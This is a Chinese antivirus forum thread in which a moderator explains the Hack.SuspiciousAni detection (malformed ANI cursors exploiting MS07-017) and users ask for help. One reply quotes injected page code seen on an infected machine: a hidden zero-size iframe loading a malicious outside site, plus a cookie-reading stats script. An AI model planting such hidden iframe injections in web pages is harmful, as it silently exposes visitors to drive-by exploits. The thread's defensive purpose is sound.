瑞星卡卡安全论坛

近段时间，看到社区上不少会员因此而不知所措，不得不简要说明一下。希望以后再因此求助的会员，会自己动手搜索一下，看到这个帖子，也就不用再惊慌了。

所谓Hack.SuspiciousAni，其实就是利用微软MS07-017中的动态光标处理漏洞的畸形ANI文件，一般由被挂马的网页的相关恶意代码下载。
该漏洞存在于系统关键文件user32.dll中。当用户进入带有相关恶意代码的网页时，浏览器将会把这种畸形ANI文件下载到本机临时文件夹中，并依照网页脚本执行，将其设置为浏览此页面时鼠标的光标图案。如果这整个过程完成，则对于没有打上MS07-017补丁的电脑，此漏洞将被触发，黑客将可远程执行任意代码（一般是下载木马）。

针对此情况，瑞星把这种畸形ANI文件列入查杀范围，命名Hack.SuspiciousAni。

有了瑞星监控的电脑上，当用户的浏览器打开带有相关恶意代码的网页，将畸形ANI文件下载到本机临时文件夹中时，瑞星文件监控和（或）网页监控将报警，提示发现Hack.SuspiciousAni。如果该文件在被下载到临时文件夹时即被瑞星查出，一般处理结果为“清除成功”，而如果该文件在被浏览器调用过程中被发现，瑞星一般将跳过相关代码并提示用户必须“重启电脑后删除文件”。无论是哪种情况，此畸形ANI文件都将不起作用，也就不会下载真正的病毒木马了。

然而有时就因为“重启后删除”这个提示，有可能会令不明就理的用户们十分紧张。因为他们会发现，重启后再扫描时，瑞星仍然会提示……

其实如果仅仅就这个“病毒”本身而言，处理方法非常简单：
关闭浏览器，然后清空IE临时文件夹。
但是，如果浏览任何网页都会出现此报毒提示，那么真正的根源就不在Hack.SuspiciousAni本身了，详情请看下面的补充说明。

另外，由于MS07-017漏洞目前被黑客在网页挂马上利用得比较频繁，强烈建议用户到windows update上打上相关补丁，补丁详情可参考http://forum.ikaka.com/topic.asp?board=28&artid=8292648或直接参考http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx

4月24日补充：

这个帖子出来之后，又发现新情况：
某些病毒（如http://forum.ikaka.com/topic.asp?board=28&artid=8302447中所述的病毒），利用ARP欺骗等手段，在用户收到的网络数据包中自动插入iframe代码，代码指向利用MS07-017漏洞的网址。使得中毒用户，以及局域网中受到此中毒电脑的欺骗攻击的用户，在上任意网站的时候，均会出现Hack.SuspiciousAni的报警。
如果用户上任意网站时都会出现Hack.SuspiciousAni的报警，即可能属于这种情况，必须采取的措施：
1.无论如何先把补丁打上。
2.查实是自己的电脑中了毒，还是别人的电脑中毒后攻击自己。
如果是自己的电脑中了毒，应及时处理；如果是别人的电脑中毒后攻击自己，应联系相关网管人员协调处理。

对于此类情况，用户要有清醒的头脑，因为这类情况下，Hack.SuspiciousAni只不过是一种“表现”，而绝不是病毒的实质，死盯着Hack.SuspiciousAni这个病毒名是没有意义的。

如果还不明白，再举一例：
威金病毒会下载“落雪”木马。如果杀毒软件对“落雪”木马报毒并清除，但是却没有查到或杀不净威金病毒，那么，“落雪”木马仍然会被一次又一次地下载下来。于是就造成了用户“落雪木马杀不死”的错觉。这种状况，对于落雪木马本身来说，的确是“重复中毒”。只不过，如何找到根由，杜绝“重复中毒”，相对于落雪木马本身的查杀来说，就又是另外一个问题了。

如何处理Hack.SuspiciousAni，是一码事，如何处理自动导致连接恶意这种网页的病毒，又是另一码事。就像下载器和被下载的木马，其功能和原理都是“可分”的。所以请绝对不要把两者混淆在一起。

其他解释，请参考http://forum.ikaka.com/topic.asp?board=28&artid=8302368第12楼的有关回复（声明，不接受该楼主的所谓BS，因为你没有权利BS任何人。还是mopery的那句话“我们这群人，做了这么多，得到的是什么……中毒的，带着“心”来求助，否则免谈！”）

清空IE临时文件夹就可以解决了吗？如果再次打开相同网站也不会感染了？

回复：
首先，其实不能称为“感染”，因为如果这个畸形ANI文件被瑞星拦截而乖乖地“躺”在IE临时文件夹里，是完全不会对系统产生实质性危害的。
其次，那个网站既然被黑客挂了恶意代码，如果打开时瑞星不报警，那才是瑞星的“失职”。既然知道了打开的网站是被挂了恶意代码，在恶意代码被清除之前，当然应该避免再上这个网站了。
很多会员之所以“恐慌”，这也是个重要原因。第一次进，瑞星报警杀了，没有再注意，第二次进，瑞星再次报警杀了，于是就紧张起来了。“瑞星杀不掉它？！”这属于理解错误。这种情况不是“中了杀不掉”，而是“杀掉了，你又去中”，属于“重复中毒”，而不属于“顽固型病毒”。

谢谢斑竹的解答！！！
其实在上贴中确切的说应该是程序，不是网站
还有个问题就是为什么同样是这个游戏（就是联众世界），家里的台式机就没事，笔记本一上就提示病毒？补丁也都打了。。。会不会是笔记本的EXE文件被感染了？卸了重装是不是就没事了？告诉我吧。。

同上~~~
给我解答吧，这个快把我逼疯了，每次看见瑞星提示这个病毒我就想哭

谢谢斑斑的解救，已经打了相应的补丁了~帮斑竹顶起来希望众多难兄难弟能看见，早日脱离苦海.

引用:

【＊蓝宝宝＊的贴子】谢谢斑竹的解答！！！ 其实在上贴中确切的说应该是程序，不是网站 还有个问题就是为什么同样是这个游戏（就是联众世界），家里的台式机就没事，笔记本一上就提示病毒？补丁也都打了。。。会不会是笔记本的EXE文件被感染了？卸了重装是不是就没事了？告诉我吧。。 ………………

可能你的笔记本本身就已经中毒了。。

呵...顶下...
确实不少人碰到了这样的麻烦....

怎么打了补丁还是会中毒啊,自从前两天中了这个病毒都杀不了毒,一开机就会中毒

我也是，打了补丁还是中毒，为什么啊？？？

引用:

【＊蓝宝宝＊的贴子】我也是，打了补丁还是中毒，为什么啊？？？ ………………

就好比 你们家为了防止偷盗 安装了防盗门 那么小偷肯定是进不来了 但不能保证它不试图闯入 懂么？
打了补丁以后你上了那些 挂有利用ani漏洞的网页 时候那个畸形的ani照样会下载到你的电脑里 不过此时 只是在临时文件夹内 但这个东西完全不会对你的系统造成损害 因为你打了那个补丁 可以防止那个东西对系统的攻击 而此时瑞星出于职责 是肯定不会坐视不管的 照样会报警

我刚刚看到瑞星实时监控提示说电脑里发现Hack.SuspiciousAni这个病毒,然后我点了"清除病毒",然后说删除成功.并没有版主所说的"重启后删除"想请问一下,是不是也是按版主所说的清空IE临时文件夹后,再打补丁就可以了?如果不是,请问要怎么解决呢?

哈哈 顶一下  想当年的JPEG漏洞  瑞星也报警了

还是不行啊,按你说的虽然不会中毒了,但还是老是跳出提示栏杀毒,不只一种毒还好几种呢,按置顶的贴子做了也不行,一登陆系统一会就提示杀毒,刚开了冰刃了才好点,到底怎么做才能彻底杀毒啊,我现在只上卡卡社区看贴子也提示杀毒.郁闷.

该用户帖子内容已被屏蔽

顶

实际上IE临时文件夹有个隐藏的“IE5”呢。

没见有几个会手工删除里面的文件的。

不行，上面的方法全都看了，都不好用。我临时文件里的毒，显示的连接网址是http://4255.biz/,,,,,这个就是病毒的网页啊，我打开任何一个网页，都会打开4255.biz这个网页。
这是其中被打开的网页，编辑的内容是：
<iframe src=http://4255.biz/ width=0 height=0 frameborder=0></iframe>                                                    var expireDate=new Date();
var hours=expireDate.getHours();
var minutes=expireDate.getMinutes();
var seconds=expireDate.getSeconds();
var now=expireDate.getTime();
function getCookieVal_cnzz (offset){var endstr = document.cookie.indexOf(";",offset);
if (endstr==-1)
endstr=document.cookie.length;
return unescape(document.cookie.substring(offset,endstr));}
function GetCookie_cnzz(name){
var arg=name+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i< clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg)
return getCookieVal_cnzz(j);
i=document.cookie.indexOf(" ",i) + 1;
if(i==0)break;}
return null;}
var agt=navigator.userAgent.toLowerCase();
data='&agt='+escape(agt)+'&r='+escape(document.referrer)+ '&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage) + '&OS=' + escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.90730700 1177077018';
cnzz_a=GetCookie_cnzz("cnzz02");
if(cnzz_a!=null){cnzz_a=parseInt(cnzz_a);cnzz_a=cnzz_a+1;}
else cnzz_a=0;
data=data+'&repeatip='+cnzz_a;
rtime=GetCookie_cnzz("rtime");
ltime=GetCookie_cnzz("ltime");
cnzz_eid=GetCookie_cnzz("cnzz_eid");
if(cnzz_eid == null){cnzz_eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;}
if(ltime< 1000000){rtime=0;ltime=0;}
else rtime=parseInt(rtime);
if(rtime< 1) rtime=0;
ltime=parseInt(ltime);
now=parseInt(now);
if(((now-ltime)>43200*1000)&&(ltime>0))
rtime=rtime+1 ;
data=data+'&rtime='+rtime+'&cnzz_eid='+escape(cnzz_eid);
data=data+'&showp='+escape(screen.width+'x'+screen.height) ;
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=468635" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://s116.cnzz.com/stat.htm?id=468635'+ data +'" border="0" width="0" height="0">');
var lefttime=1000*(86400-hours*3600-minutes*60-seconds);expireDate.setTime(expireDate.getTime() + 500*86400);document.cookie="cnzz02="+cnzz_a+"; expires="+expireDate.toGMTString()+ "; path=/";
var lefttime=1000*86400*182;expireDate.setTime(now + lefttime);document.cookie="rtime="+rtime+";expires="+expireDate.toGMTString()+ ";path=/";document.cookie="ltime="+now+";expires=" + expireDate.toGMTString()+ ";path=/";document.cookie="cnzz_eid="+escape(cnzz_eid)+ ";expires="+expireDate.toGMTString()+";path=/";


补丁也打了，还是不行啊

下载补丁了就会好了吗?
真的被这个病毒给弄疯掉了

学习``

我没有碰到呀.运气挺好的

附的图和本文没直接关系.. 只是有点需要.  见谅

附件: 7053972007421170615.bmp

哎，为什么每次出新病毒都让我碰上了，上次有一个新病毒：桌面弹出十个窗口，什么1.exe\2.exe\3.exe，后来也没处理好，瑞星也不管用，我就还原了系统。
才过了半个月，这次又碰到这个病毒，017这个补丁早就打了，可还是中了，我发现我是在运行vagaa这个软件下载电影时中的。
哎，实在不想再还原系统了。
看来以后除了几大门户网站，其它的网站都不能上了。

瑞星老提示说以下5个病毒文件清除不了，我用费尔工具强制清除并抑制再生下面的5个文件：

D:\办公软件\我的文档\IE缓存\Temporary Internet Files\Content.IE5\YBGBUXEZ\1[1].jpg

D:\办公软件\我的文档\IE缓存\Temporary Internet Files\Content.IE5\S1WFOR07\1[1].jpg

D:\办公软件\我的文档\IE缓存\Temporary Internet Files\Content.IE5\1VBN9T0E\1[1].jpg

D:\办公软件\我的文档\IE缓存\Temporary Internet Files\Content.IE5\YBGBUXEZ\1[2].jpg


D:\办公软件\我的文档\IE缓存\Temporary Internet Files\Content.IE5\QDHMRQ50\1[1].jpg

然后到安全模式下删除了
D:\办公软件\我的文档\IE缓存\Temporary Internet Files的所以文件，包括Content.IE5里面的文件。
重起后，开机上网，什么网站也没上，就上了卡卡社区，一分钟后，病毒提示又出来了，而且以jpg为扩展名的病毒文件又改名了，不是先前的那5个了，看来是随机变的，希望难友们把你们的方法都拿出来借鉴一下。

中了这个病毒后，IE肯定是不健康的了。在状态栏显示一个黄色的三角形叹号。现在我每刷新一次，都会弹出来病毒提示，烦死了。

该用户帖子内容已被屏蔽

哇！ 看来我很荣幸的中了一个有名的毒~~~昨天把它灭了时候还不以为然呢~~ 那请问一下，今天我装了遨游，打的那个补丁对遨游有作用么？也就是说，我用遨游的话，会不会再中这个名毒呀？ 谢谢了哦

该用户帖子内容已被屏蔽

【回复“轩辕小聪”的帖子】可是我清除了IE临时文件夹，可还是有，也不知道我怎么中的？斑竹能否给我解一下疑惑。

补丁下栽后应该在那里安装？指路径

顶起来，学习了